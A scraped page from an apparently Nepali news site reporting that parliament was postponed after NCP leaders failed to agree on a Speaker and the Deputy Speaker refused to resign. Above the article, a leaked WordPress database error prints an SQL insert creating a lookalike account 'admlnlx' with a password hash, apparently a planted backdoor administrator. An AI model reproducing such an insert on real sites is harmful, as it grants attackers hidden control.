WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN9C47T6EqdlLDnYH4rePDkvTV1wth1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 08:32:45', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, पुस २७, काठमाडौं । नेपाल कम्युनिष्ट पार्टी (नेकपा) मा सभामुखको टुङ्गो नलागेपछि प्रतिनिधिसभा बैठक स्थगित भएको छ ।
प्रधानमन्त्री निवास बालुवाटारमा आइतबार बिहानैदेखि शीर्ष नेताहरुबीच छलफल भएको थियो । शीर्ष नेताहरुबीच छलफलमा नमिलेपछि आइतबार दिउँसो १ बजे निर्धारित गरिएको संसद बैठक आउँदो माघ ६ गतेसम्मका लागि स्थगित गरिएको छ ।
नेकपामा उपसभामुख तुम्बाहाम्फेलाई राजीनामा गराउने प्रयास भइरहे पनि उनले अस्वीकार गर्दै आएकी छन् । शनिबार बसेको नेकपा सचिवालयको बैठकले उपसभामुख तुम्बाहाम्फेलाई पदबाट राजीनामा दिन र सभामुख निर्वाचनको बाटो खोल्न भनेको थियो
प्रधानमन्त्री निवासमा आइतबार शीर्ष नेताहरुबीच छलफलमा उपसभामुख शिवमाया तुम्बाहाम्फे पनि उपस्थित थिइन् ।
‑अनलाइन खबर